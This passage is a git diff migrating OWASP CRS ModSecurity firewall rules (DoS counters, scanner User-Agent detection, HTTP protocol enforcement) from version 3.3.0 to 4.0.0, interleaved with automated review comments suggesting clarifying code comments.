"@eq 0" \ - "setvar:'ip.dos_block_counter=+1',\ - setvar:'ip.dos_block_flag=1',\ - setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\ - setvar:'ip.dos_block_counter=0',\ - expirevar:'ip.dos_block_flag=60'" - - -# -# Block and track # of requests but don't log -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912130,\ - phase:1,\ - drop,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - 
tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block_counter=+1'" - - -# -# -=[ Anti-Automation / DoS Protection: Count requests ]=- -# - -# -# Skip if we have blocked the request -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912140,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOS-PROTECTION-CHECKS" - - -# -# DOS Counter: Count the number of requests to non-static resources -# -SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ - "id:912150,\ - phase:5,\ - pass,\ - capture,\ - t:none,t:lowercase,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.extension=/%{TX.1}/',\ - chain" - SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ - "setvar:'ip.dos_counter=+1'" - - -# -# Check DOS Counter -# If the request count is greater than or equal to user settings, -# we raise the burst counter. This happens via two separate rules: -# - 912160: raise from 0 to 1 -# - 912161: raise from 1 to 2 -# -# This approach with two rules avoids raising the burst counter -# from 0 to 2 via two concurrent requests. We do not raise the -# burst counter beyond 2. 
-# -# -SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ - "id:912160,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BURST_COUNTER "@eq 0" \ - "setvar:'ip.dos_burst_counter=1',\ - setvar:'!ip.dos_counter',\ - expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" - - -SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ - "id:912161,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BURST_COUNTER "@ge 1" \ - "setvar:'ip.dos_burst_counter=2',\ - setvar:'!ip.dos_counter',\ - expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" - - -# -# Check DOS Burst Counter and set Block -# Check the burst counter - if greater than or equal to 2, then we set the IP -# block variable for a given expiry and issue an alert. 
-# -SecRule IP:DOS_BURST_COUNTER "@ge 2" \ - "id:912170,\ - phase:5,\ - pass,\ - t:none,\ - log,\ - msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block=1',\ - expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# - -# -# Check DOS Burst Counter and set Block -# Check the burst counter - if greater than or equal to 1, then we set the IP -# block variable for a given expiry and issue an alert. -# -# This is a stricter sibling of rule 912170. 
-# -SecRule IP:DOS_BURST_COUNTER "@ge 1" \ - "id:912171,\ - phase:5,\ - pass,\ - t:none,\ - log,\ - msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-dos',\ - tag:'paranoia-level/2',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block=1',\ - expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) -# - - - -# -# -= Paranoia Levels Finished =- -# -SecMarker "END-REQUEST-912-DOS-PROTECTION" - -SecMarker "END-DOS-PROTECTION-CHECKS" diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf index 4001ba83ad..24d23f67c7 100644 --- a/rules/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/REQUEST-913-SCANNER-DETECTION.conf 
@@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -13,29 +14,33 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # -# -=[ Vulnerability Scanner Checks ]=- +# -=[ Security Scanner Checks ]=- # -# These rules inspect the default User-Agent and Header values sent by -# various commercial and open source vuln scanners. +# This rule inspects the default User-Agent and Header values sent by +# various commercial and open source scanners, mostly +# security / vulnerability scanners. # -# The following rules contain User-Agent lists: -# 913100 - security scanners (data file scanners-user-agents.data) -# 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) -# 913102 - web crawlers/bots (data file crawlers-user-agents.data) +# It is based on a curated list of known malicious scanners in widespread use. +# This list is maintained in scanners-user-agents.data. # +# With CRSv4, the project has given up on keeping track of different categories +# of scanners and scripting agents, mostly because it's very hard to draw +# a line between benign, mostly benign and malicious. And because dedicated +# attackers will change the user agent anyways. 
+ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ "id:913100,\ - phase:2,\ + phase:1,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'Found User-Agent associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ 
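Review bot: The rewritten header comment still says the rule inspects "the default User-Agent and Header values", but once the following hunk removes 913110 (the `scanners-headers.data` check against REQUEST_HEADERS_NAMES|REQUEST_HEADERS) the only target left in this file is `REQUEST_HEADERS:User-Agent`, so the comment overstates what 913100 covers; suggest `# This rule inspects the default User-Agent values sent by various commercial and open source scanners`. The change from `t:none,t:lowercase` to `t:none` on 913100 is also unexplained; `@pmFromFile` matches case-insensitively, so the transformation was redundant, and a line such as `# @pmFromFile matches case-insensitively, no t:lowercase needed` would stop a later maintainer from adding it back when the data file grows mixed-case entries. The 913100 rule body continues past the end of this hunk.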
@@ -46,148 +51,31 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ - "id:913110,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found request header associated with security scanner',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scanner',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - - -SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ - "id:913120,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found request filename/argument associated with security scanner',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scanner',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - 
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -=[ Scripting/Generic User-Agents ]=- -# -# This rule detects user-agents associated with various HTTP client libraries -# and scripting languages. Detection suggests attempted access by some -# automated tool. -# -# This rule is a sibling of rule 913100. +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \ - "id:913101,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found User-Agent associated with scripting/generic HTTP client',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scripting',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -# -# -=[ Crawler User-Agents ]=- -# -# This rule detects user-agents associated with various crawlers, SEO 
tools, -# and bots, which have been reported to potentially misbehave. -# These crawlers can have legitimate uses when used with authorization. -# -# This rule is a sibling of rule 913100. -# -SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ - "id:913102,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found User-Agent associated with web crawler/bot',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-crawler',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" 
"id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index 54e5fe6a78..f545b3185c 100644 --- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,7 +14,7 @@ # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. -# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html +# https://www.rfc-editor.org/rfc/rfc9110.html 
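Review bot: With the `setvar:'ip.reput_block_flag=1'`, `setvar:'ip.reput_block_reason=%{rule.msg}'` and `expirevar:'ip.reput_block_flag=...'` lines dropped from 913100, a scanner User-Agent match now only adds to `tx.inbound_anomaly_score_pl1` for the current request and leaves no per-client state behind. That appears consistent with the removal of the 910 IP-reputation rules earlier in this diff, but nothing in the 913 file records the behaviour change, and the PL2 section is now empty after 913101 and 913102 are deleted. A short comment under the PL1 header, e.g. `# Matches are scored per request only; no IP-level reputation flag is set (rules 913101/913102/913110/913120 were removed in CRS 4)`, would save operators who grep for the old ids or for ip.reput_block_flag from assuming a loading error.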
@@ -22,10 +23,10 @@ # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # 
@@ -36,17 +37,22 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAf # Uses rule negation against the regex for positive security. The regex specifies the proper # construction of URI request lines such as: # -# "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] +# "http" "://" authority path-abempty [ "?" query ] # # It also outlines proper construction for CONNECT, OPTIONS and GET requests. # +# Regular expression generated from regex-assembly/920100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920100 +# # -=[ References ]=- -# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 +# https://www.rfc-editor.org/rfc/rfc9110.html#section-4.2.1 # http://capec.mitre.org/data/definitions/272.html # -SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \ +SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\v]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?)[\s\v]+[\.-9A-Z_a-z]+)$" \ "id:920100,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Invalid HTTP Request Line',\ @@ -58,9 +64,9 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # 
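Review bot: The `connect` branch of the new 920100 expression accepts `[\--9A-Z_a-z]+:[0-9]+`, i.e. a host name with a mandatory port, where the removed expression only allowed a dotted IPv4 address with an optional port; that is a deliberate policy widening, yet the surrounding comment still only lists the generic `"http" "://" authority path-abempty [ "?" query ]` form and says nothing about authority-form CONNECT targets. Suggest adding `# CONNECT accepts a dotted IPv4 address (port optional) or a host name, which must carry an explicit port (authority-form)` next to the regex-assembly note. Since the comment block is hand-maintained while the regex is regenerated from regex-assembly/920100.ra, the note is safest in the .conf comment rather than only in the assembly file.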
@@ -75,27 +81,31 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+ # # -=[ Rule Logic ]=- # These rules check for the existence of the ' " ; = meta-characters in -# either the file or file name variables. -# HTML entities may lead to false positives, why they are allowed on PL1. -# Negative look behind assertions allow frequently used entities &_; +# either the "name" (FILES) and "filename" (FILES_NAMES) variables. +# HTML entities may lead to false positives, which is why +# frequently used ones, such as "ä", are allowed at PL1. # # -=[ Targets, characters and html entities ]=- # -# 920120: PL1 : FILES_NAMES, FILES -# ['\";=] but allowed: -# &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; -# &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' +# 920120 + 920122: PL1 : FILES_NAMES, FILES +# Disallow ['\";=], except for frequently used HTML entities (see 920120.data). # # 920121: PL2 : FILES_NAMES, FILES -# ['\";=] : ' " ; = meta-characters -# -# Not supported by re2 (?@-]+)*$" \ +# - application/soap+xml; charset=utf-8; action="urn:localhost-hwh#getQuestions" +# - application/*+json + +SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \ "id:920470,\ phase:1,\ block,\ 
@@ -927,16 +983,16 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+-]+(?:\s?;\s?(?:action|boundar tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # In case Content-Type header can be parsed, check the mime-type against # the policy defined in the 'allowed_request_content_type' variable. # To change your policy, edit crs-setup.conf and activate rule 900220. SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ "id:920420,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,\ @@ -950,13 +1006,13 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ "t:lowercase,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -967,7 +1023,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ phase:1,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'Request content type charset is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ 
@@ -978,14 +1034,36 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" - SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \ - "t:none,\ + SecRule TX:content_type_charset "!@within %{tx.allowed_request_content_type_charset}" \ + "t:lowercase,\ ctl:forceRequestBodyVariable=On,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# +# Restrict charset parameter inside content type header to occur max once. +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ + "id:920530,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Multiple charsets detected in content type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict protocol versions. @@ -1005,19 +1083,19 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict file extension # SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ "id:920440,\ - phase:2,\ + phase:1,\ block,\ capture,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'URL file extension is restricted by policy',\ logdata:'%{TX.0}',\ tag:'application-multi',\ 
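Review bot: The chained charset check now evaluates `!@within %{tx.allowed_request_content_type_charset}` against `|%{tx.1}|`, so the setup variable must be a `|`-delimited list in the same style as `tx.allowed_request_content_type` two hunks above; a value carried over from a setup written for the removed `!@rx ^%{tx.allowed_request_content_type_charset}$` form (a plain regex alternation) has no surrounding pipes on its first and last entries, and those charsets would start scoring after the upgrade. The hunk adds no comment about the format change; suggest `# tx.allowed_request_content_type_charset must be a |-delimited list (|utf-8| |iso-8859-1| ...), not a regex alternation` above the rule. Separately, the new 920530 pattern `charset.*?charset` is not tied to a parameter name, so a Content-Type whose `boundary=` value happens to contain the word twice would also fire; `charset\s*=.*?charset\s*=` keeps the intent of "charset given more than once" with less false-positive surface. The charset rule's opening lines are outside this hunk.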
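Review bot: Adding `t:urlDecodeUni` to the parent rule of 920440 while the chained rule keeps `t:none,t:urlDecodeUni,t:lowercase` means the captured extension is URL-decoded twice before the `@within %{tx.restricted_extensions}` check, whereas previously only the chained rule decoded a raw capture. If catching double-encoded extensions is the intent, that should be stated so the second transformation is not "cleaned up" later, e.g. `# urlDecodeUni on both rules is deliberate: the chain also catches double-encoded extensions`. Because `tx.1` is now taken after decoding, `logdata:'%{TX.0}'` reports the decoded value as well, which the same comment can mention. The setvar and chained rule of 920440 sit in the next hunk.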
